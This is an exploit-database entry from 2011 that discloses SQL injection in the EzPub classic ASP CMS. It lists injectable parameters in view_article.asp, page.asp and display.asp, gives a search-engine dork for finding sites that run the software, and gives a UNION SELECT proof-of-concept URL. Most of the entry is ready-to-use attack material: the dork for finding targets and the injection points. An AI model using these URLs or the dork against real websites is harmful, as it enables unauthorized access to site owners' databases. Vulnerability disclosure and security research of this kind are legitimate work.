id: 15559
date: 03/09/2011
title: EzPub CMS SQL Injection Vulnerability
author: p0pc0rn
cves: 

Title    : EzPub - Simple Classic ASP CMS Vulnerable to SQL Injection
Web    : http://www.soft4web.ro
Found by: p0pc0rn 08/03/2011
Dork    : intext:"Powered by EZPub"


SQL - Microsoft JET Database Engine error
------------------------------------------

http://site.com/view_article.asp?item=[SQL]
http://site.com/page.asp?pID=[SQL]
http://site.com/display.asp?sortby=sections&sID=[SQL]

POC
---

http://site.com/view_article.asp?item=1 union select 1 from test.a



#  0day.today [2023-03-24]  #